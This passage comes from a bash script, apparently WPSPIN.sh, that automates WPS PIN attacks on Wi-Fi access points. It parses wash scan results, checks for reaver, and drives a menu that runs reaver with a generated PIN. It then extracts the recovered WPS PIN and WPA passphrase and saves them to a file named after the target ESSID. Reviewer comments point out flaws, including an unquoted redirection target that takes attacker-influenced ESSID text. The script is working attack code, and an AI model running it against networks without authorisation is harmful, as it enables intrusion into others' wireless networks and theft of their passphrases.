#                  are therefore LOCAL to WASH_SCAN: WASH_DISPLAY, OUTPUT and ATTACK (called at the end)
#                  see them only through bash dynamic scoping, and they vanish when WASH_SCAN returns.
# Input file:      wash_scan.txt in the current directory, one AP per line, whitespace-separated fields.
# NOTE(review): every column is extracted with its own `cat | awk` pass over the file (six passes for
# wash), and since awk splits on whitespace an ESSID containing spaces is cut at its first word.
if [ "$WALSH_O_WASH" == "wash" ]; then # wash layout: BSSID CHANNEL RSSI WPS LOCKED ESSID
declare -a BSSID # one array per column of the scan result
declare -a CHANNEL
declare -a RSSI
declare -a WPS
declare -a LOCKED
declare -a ESSID
for i in 'BSSID' 'CHANNEL' 'RSSI' 'WPS' 'LOCKED' 'ESSID'; # i names the array being filled
do
count=1 # arrays are filled from index 1
if [ "$i" == "BSSID" ]; then # first column: BSSID of the AP
while read -r line; do # one element per line of the file
BSSID[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }') # field 1
elif [ "$i" == "CHANNEL" ]; then
while read -r line; do
CHANNEL[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }') # field 2: channel number
elif [ "$i" == "RSSI" ]; then
while read -r line; do
RSSI[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $3 }') # field 3
elif [ "$i" == "WPS" ]; then
while read -r line; do
WPS[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $4 }') # field 4
elif [ "$i" == "LOCKED" ]; then
while read -r line; do
LOCKED[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $5 }') # field 5
elif [ "$i" == "ESSID" ]; then
while read -r line; do
ESSID[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $6 }') # field 6 only (first word of the ESSID)
fi
clear # screen is cleared after every column
done
else # walsh layout: BSSID ESSID
declare -a BSSID
declare -a ESSID
for i in 'BSSID' 'ESSID';
do
count=1 # arrays are filled from index 1
if [ "$i" == "BSSID" ]; then # first column: BSSID of the AP
while read -r line; do # one element per line of the file
BSSID[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $1 }') # field 1
elif [ "$i" == "ESSID" ]; then # second column: ESSID of the AP
while read -r line; do
ESSID[${count}]="$line"
count=$((count+1))
done < <( cat wash_scan.txt | awk -F' ' '{ print $2 }') # field 2 only (first word of the ESSID)
fi
clear # screen is cleared after every column
done
fi
WASH_DISPLAY # language-dependent display of the arrays above
OUTPUT
ATTACK # ATTACK may call WASH_SCAN again, so the call stack grows with each round trip
}
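REAVER_CHECK(){
  # Check that reaver is installed; without it the user is sent to the short menu.
  # Globals read:    NO_REAVER (language-dependent warning text)
  # Globals written: SORTMENUE_WARNING, WALSH_O_WASH
  # Calls:           SHORTMENUE (defined elsewhere) when reaver is missing
  # `command -v` is the portable builtin replacement for `which`, and testing the
  # command directly avoids the fragile "$?" check of the previous version.
  if ! command -v reaver > /dev/null 2>&1; then
    SORTMENUE_WARNING="$NO_REAVER" # warns that reaver needs to be installed
    SHORTMENUE
  fi
  # Reaver 1.3 ships its scanner as "walsh", reaver 1.4 as "wash"; remember which
  # one is present so the scan functions call the right name.
  if command -v walsh > /dev/null 2>&1; then
    WALSH_O_WASH="walsh"
  else
    WALSH_O_WASH="wash"
  fi
}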
ATTACK(){ # Attack menu dispatcher: run reaver with the generated PIN, re-display the scan, go back, restart or exit
# Globals read:    ATTACK_MENUE_CHOICE (presumably set by ATTACK_MENUE_DISPLAY), BIG_MENUE_CHOICE, BSSID,
#                  ESSID, CHANNEL, PIN, MON_ATTACK, language strings (STOP_REAVER, FAILED, KEY_FOUND),
#                  colour variables
# Globals written: VICTORY_PIN, KEY
# Files:           attack.txt (reaver log via tee) and $ESSID.txt (result), both in the current directory
# Note: options 1 and 2 call ATTACK again (directly or via WASH_SCAN), so every menu round trip adds
# a stack frame instead of looping.
ATTACK_MENUE_DISPLAY # menu text defined by the selected language
if [ "$ATTACK_MENUE_CHOICE" == 1 ]; then # option 1: reaver with the default PIN
echo ""
echo "$STOP_REAVER" # reminds the user that the run can be stopped with ctrl-c
if [ "$BIG_MENUE_CHOICE" == 1 ]; then # scan mode: the channel is known and passed along
sudo reaver -b $BSSID -i $MON_ATTACK -p $PIN -vv -c $CHANNEL -d 2 -t 2 -T 2 | tee attack.txt # delays added to avoid stressing the AP (author's note)
else # generator mode: no channel available
sudo reaver -b $BSSID -i $MON_ATTACK -p $PIN -vv -d 2 -t 2 -T 2 | tee attack.txt
fi
VICTORY_PIN=$(cat attack.txt | grep "WPS PIN" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev) # text after "WPS PIN:" with its first two and last character dropped
KEY=$(cat attack.txt | grep "WPA PSK" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev) # same for "WPA PSK:"; KEY is the recovered passphrase
# NOTE: attack.txt is only removed in the success branch below; it stays behind after a failed run
if [ "$KEY" == "" ]; then # nothing recovered
echo ""
echo "$FAILED" # failure message defined by the selected language
echo ""
else
echo -e " $blanco WPA$colorbase>>> $rojo $KEY $colorbase " # success message
echo "$KEY_FOUND"
echo "
KEY FOUND!!! XD
WPA >>>>>> $KEY
ESSID > $ESSID
BSSID > $BSSID
PIN > $VICTORY_PIN
WPA > $KEY
WPA >>>>>> $KEY
WPSPIN for linux www.crack.wifi.com www.facebook.com/soufian.ckin2u www.auditoriaswireless.net
" > $ESSID.txt # NOTE(review): unquoted redirection target; ESSID comes from the scan output, so spaces, globs or path characters in it change where this file lands — should be "$ESSID.txt"
echo -e " $azulfluo $ESSID.txt $colorbase"
echo ""
echo -e "ESSID > $blanco $ESSID $colorbase "
echo -e "BSSID > $blanco $BSSID $colorbase "
echo -e "PIN > $rojo $VICTORY_PIN $colorbase "
echo -e "WPA > $amarillo $KEY $colorbase "
rm attack.txt &> /dev/null
fi
ATTACK # back to the attack menu (recursive call)
elif [ "$ATTACK_MENUE_CHOICE" == 2 ]; then # option 2: select another target
if [ "$BIG_MENUE_CHOICE" == 2 ]; then # generator mode: nothing to re-display, fall through to the caller
echo " "
else
while [ "$ATTACK_MENUE_CHOICE" == 2 ]; do # scan mode: show the scan results again
WASH_SCAN # WASH_SCAN itself calls OUTPUT and ATTACK, so the two calls below run only once it returns
OUTPUT
ATTACK
done
fi
elif [ "$ATTACK_MENUE_CHOICE" == 3 ]; then # option 3: go back to the previous menu
BIG_MENUE
elif [ "$ATTACK_MENUE_CHOICE" == 4 ]; then # option 4: restart / change language
unset # NOTE: `unset` without arguments does nothing
CLEAN
bash WPSPIN.sh # relative path: relies on the current directory being the script's directory
else # any other choice: exit
CLEAN
CIAO
exit 0
fi
}
BIG_MENUE(){
BIG_MENUE_DISPLAY # options of the "big menu", WPSPIN with all options available
if [ "$BIG_MENUE_CHOICE" == 1 ]; then # 1 is washscan = scan with wash and attack with reaver guided
echo ""
echo "$WASHWAIT" #####################################REDIGER SELON LANGUE######### nessage to advice the user that the scan is launched and result will be displayed in a while
echo ""
sudo xterm -l -lf scan.txt -e $WALSH_O_WASH -i $MON_ATTACK -C
# sudo xterm -e $WALSH_O_WASH -i $MON_ATTACK -C 2>&1 | tee scan.txt # we take out eh two fist line of wash command and send the scan to temp ; do
if [ "$WALSH_O_WASH" == "wash" ]; then
cat scan.txt | sed '1,6d' | grep "........." > wash_scan.txt
sudo rm scan.txt &> /dev/null
else
cat scan.txt | sed "1,3d" | grep "........." > wash_scan.txt
sudo rm scan.txt &> /dev/null